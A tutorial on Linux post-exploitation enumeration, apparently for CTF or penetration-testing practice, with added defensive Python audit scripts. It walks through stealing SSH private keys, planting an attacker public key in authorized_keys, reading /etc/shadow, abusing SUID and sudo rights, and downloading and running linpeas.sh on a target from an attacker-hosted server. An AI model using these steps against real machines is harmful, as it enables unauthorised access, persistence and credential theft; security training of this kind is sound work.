Basic enumeration vectors after getting a reverse shell on the Linux machine
Problem:
After getting reverse shell access on the target machine it is easy to get lost deciding where to move next in order to escalate your privileges. You have to enumerate the machine thoroughly, and enumeration is the key step in this process. You need an established methodology for finding the clues that help you capture the target machine.
Basic enumeration methodology:
- After getting the reverse shell, the first thing to do is stabilize it. See here.
- Enumerate the most important files on the Linux OS and try to identify possible security flaws.
- Check the most sensitive files under the /etc directory.
- If necessary, use automated enumeration scripts like Linpeas and LinEnum.
Check the .ssh directory for SSH keys:
- Check whether the .ssh directory has SSH keys stored inside and whether you have write permission for the directory:

```bash
cd ~/.ssh
ls -al
```

- If it has secret keys, copy them to your attacking machine and use them:

```bash
chmod 600 [secret_key]
ssh -i [secret_key] [username]@[target_machine_ip]
# Example:
chmod 600 id_rsa
ssh -i id_rsa user@10.10.20.53
```

- In case there are no keys on the target machine, you can generate your own keys on your machine and then transfer them to the target:

```bash
cd ~/.ssh
ssh-keygen
```

- Copy the content of your public key into the authorized_keys file in the ~/.ssh folder on the target machine:

```bash
# On the target machine
cd ~/.ssh
# If the authorized_keys file is not present, create it
touch authorized_keys
vim authorized_keys
# Paste your public key, then save and close the file
```
System enumeration
- Check all info about the system and the user:

```bash
id
uname -a
```

- Check the ~/.bash_history file, which keeps track of the user's command history:

```bash
cat ~/.bash_history
```

- Check the .bash_profile and .bashrc files for unusual shell commands, file paths and binaries:

```bash
cat ~/.bash_profile
cat ~/.bashrc
```

- Check the sudo version, as some versions are vulnerable to privilege escalation:

```bash
sudo -V
```

- Check whether the user can run any commands on the system with sudo. If yes, find exploits at GTFOBins and use them to escalate:

```bash
sudo -l
```
Check files under the /etc directory:
- Check the /etc/passwd file, which stores the information required for the user login process:

```bash
cat /etc/passwd
```

Example entry and the meaning of its fields:

```
user:x:1003:1003:,,,:/home/user:/bin/bash
# user       - username
# x          - indicates that the encrypted account password is stored in the /etc/shadow file and cannot be displayed in plain text
# 1003       - User ID (UID): each non-root user has their own UID (1-99). UID 0 is reserved for root.
# 1003       - Group ID (GID)
# ,,,        - user ID info (comment) field
# /home/user - the user's home directory
# /bin/bash  - path of the command or shell that is used by the user
```

- If you have write access to the /etc/passwd file you can escalate by creating a custom entry with root privileges. More info here.
- Check the /etc/shadow file, which stores the password hashes for user accounts:

```bash
cat /etc/shadow
```

Example entry and the meaning of its fields:

```
user:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAMWf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:8:::
# user            - username
# $6$1FiLdnFwT... - password hash; the $6$ prefix means SHA-512 ($1$ would mean MD5)
# 18483           - date of the last password change, as days since the Unix epoch
# 0               - minimum number of days between password changes
# 99999           - maximum number of days the password is valid
# 8               - number of days before expiry that the user is warned to change the password
```

- Check the /etc/hosts file for any unusual network entries.
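As an added example (not part of the original page), the following Python script parses /etc/passwd and /etc/shadow records using the field layout described above and flags the entries worth a closer look: an extra UID 0 account, a hash or empty password kept in /etc/passwd itself, and empty or MD5 hashes in /etc/shadow. The sample records are constructed; the functions accept the real file contents as read with cat.

```python
# Added example (not from the original page): audit /etc/passwd and /etc/shadow
# records using the field layout described above. Sample records are constructed.
from typing import List, Tuple
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
backup:x:0:34:backup:/var/backups:/bin/sh
svc:$6$abc$hashhere:1004:1004::/home/svc:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$salt$hash:18483:0:99999:7:::
legacy:$1$salt$md5hash:15000:0:99999:7:::
guest::18483:0:99999:7:::
daemon:*:18474:0:99999:7:::
"""
HASH_PREFIXES = {"$1$": "md5", "$5$": "sha256", "$6$": "sha512", "$y$": "yescrypt"}

def hash_algorithm(field: str) -> str:
    """Classify a crypt(3) password field: '' = no password, '*' or '!' = locked."""
    if field == "":
        return "empty"
    if field[0] in "*!":
        return "locked"
    return HASH_PREFIXES.get(field[:3], "unknown")

def records(text: str):  # yield the colon-separated fields of each real record line
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            yield line.split(":")

def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Flag extra UID 0 accounts and password fields that are not shadowed ('x')."""
    findings = []
    for name, pw, uid, *_rest in records(text):  # name:pw:uid:gid:gecos:home:shell
        if uid == "0" and name != "root":
            findings.append((name, "UID0_NOT_ROOT"))
        if pw != "x":  # 'x' means the real hash lives in /etc/shadow
            findings.append((name, "EMPTY_PASSWORD" if pw == "" else "HASH_IN_PASSWD"))
    return findings

def audit_shadow(text: str) -> List[Tuple[str, str]]:
    """Flag accounts with no password and hashes using the obsolete MD5 scheme."""
    findings = []
    for name, pw, *_rest in records(text):  # name:hash:lastchange:min:max:warn:...
        algo = hash_algorithm(pw)
        if algo == "empty":
            findings.append((name, "EMPTY_PASSWORD"))
        elif algo == "md5":
            findings.append((name, "WEAK_HASH_MD5"))
    return findings
```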
Use the find command to search for vulnerable files:
- Look for .log, .conf and backup .bak files:

```bash
# Use find to search for log files on the system (quote the pattern so the shell does not expand it first)
find -type [file_type] -name [file_name] 2>/dev/null
find -type f -name "*.log" 2>/dev/null
```

The most common file extensions are:
- .a : a static library
- .au : an audio file
- .bin : a) a binary image of a CD (usually a .cue file is also included); b) represents that the file is binary and is meant to be executed
- .bz2 : a file compressed using bzip2
- .c : a C source file
- .conf : a configuration file. System-wide config files reside in /etc while any user-specific configuration will be somewhere in the user's home directory
- .cpp : a C++ source file
- .deb : a Debian package
- .diff : a file containing instructions to apply a patch from a base version to another version of a single file or a project (such as the Linux kernel)
- .dsc : a Debian source information file
- .ebuild : Bash script used to install programs through the portage system. Especially prevalent on Gentoo systems
- .el : Emacs Lisp code file
- .elc : compiled Emacs Lisp code file
- .gif : a graphical or image file
- .h : a C or C++ programming language header file
- .html/.htm : an HTML file
- .iso : an image (copy) of a CD-ROM or DVD in the ISO-9660 filesystem format
- .jpg : a graphical or image file, such as a photo or artwork
- .ko : the kernel module extension for the 2.6.x series kernel
- .la : a file created by libtool to aid in using the library
- .lo : the intermediate file of a library that is being compiled
- .lock : a lock file that prevents the use of another file
- .log : a system or program's log file
- .m4 : M4 macro code file
- .o : 1) the intermediate file of a program that is being compiled; 2) the kernel module extension for a 2.4 series kernel; 3) a program object file
- .pdf : an electronic image of a document
- .php : a PHP script
- .pid : some programs write their process ID into a file with this extension
- .pl : a Perl script
- .png : a graphical or image file
- .ps : a PostScript file, formatted for printing
- .py : a Python script
- .rpm : an RPM package. See Distributions of Linux for a list of distributions that use RPMs as a part of their package management system
- .s : an assembly source code file
- .sh : a shell script
- .so : a Shared Object, which is a shared library. This is the equivalent of a Windows DLL file
- .src : a source code file. Written in plain text, a source file must be compiled to be used
- .sfs : Squashfs filesystem used in the SFS Technology
- .tar.bz2, .tbz2, .tar.gz : a compressed file per File Compression
- .tcl : a TCL script
- .tgz : a compressed file per File Compression. This may also denote a Slackware binary or source package
- .txt : a plain ASCII text file
- .xbm : an XWindows Bitmap image
- .xpm : an image file
- .xcf.gz, .xcf : a GIMP image (native image format of the GIMP)
- .xwd : a screenshot or image of a window taken with xwd
- .zip : extension for files in ZIP format, a popular file compression format
- .wav : an audio file
- Search for files with the SUID bit set. SUID is a type of permission that allows users to execute a file with the permissions of the file's owner rather than their own. If such files are found, look them up on GTFOBins:

```bash
find / -perm -u=s -type f 2>/dev/null  # -u=s searches for files with the SUID bit set
```
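The find command above lists setuid files at one moment in time. As an added example (not code from the original page), here is the same search in Python together with a baseline comparison, which is how a defender notices a setuid binary that appeared after the last check. The helper make_demo_tree and its temporary directory are constructed for the demo.

```python
# Added example (not from the original page): the Python equivalent of
# `find / -perm -u=s -type f`, plus a baseline comparison so that a setuid
# binary that was not there before stands out. The demo tree is constructed.
import os
import stat
import tempfile
from typing import Set


def find_suid(root: str) -> Set[str]:
    """Return the regular files under root whose mode has the setuid bit set."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks, like find -type f
            except OSError:
                continue             # unreadable entries, the 2>/dev/null of find
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def unexpected_suid(root: str, baseline: Set[str]) -> Set[str]:
    """Setuid files present now that are not in the known-good baseline."""
    return find_suid(root) - baseline


def make_demo_tree() -> tuple:
    """Build a constructed directory with one setuid file and one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.mkdir(os.path.join(root, "bin"))
    suid_path = os.path.join(root, "bin", "helper")
    plain_path = os.path.join(root, "bin", "tool")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(suid_path, 0o4755)   # rwsr-xr-x: the 's' is the setuid bit
    os.chmod(plain_path, 0o755)
    return root, suid_path, plain_path


if __name__ == "__main__":
    root, suid_path, _plain = make_demo_tree()
    baseline = set()                      # e.g. the set recorded at install time
    print("new setuid files:", sorted(unexpected_suid(root, baseline)))
```

On a real host, record find_suid("/") once on a known-good system and diff later runs against it.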
Check for unusual network connections on the host:
The netstat command displays network status and protocol statistics. On newer distributions netstat may not be installed; ss -tulpn gives the same listing.

```bash
netstat -tulpn
```
Use automated scripts for enumeration:
- Transfer the linpeas.sh script to the target machine and execute it:

```bash
# ON YOUR MACHINE
cd
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
# START A WEB SERVER, DEFAULT PORT 8000
python3 -m http.server
# ON THE TARGET MACHINE
wget [your_machine_ip]:8000/linpeas.sh
wget 10.10.20.53:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

- Use the more lightweight LinEnum.sh script. Transfer it to the target the same way as linpeas.sh. More info can be found here.

```bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
```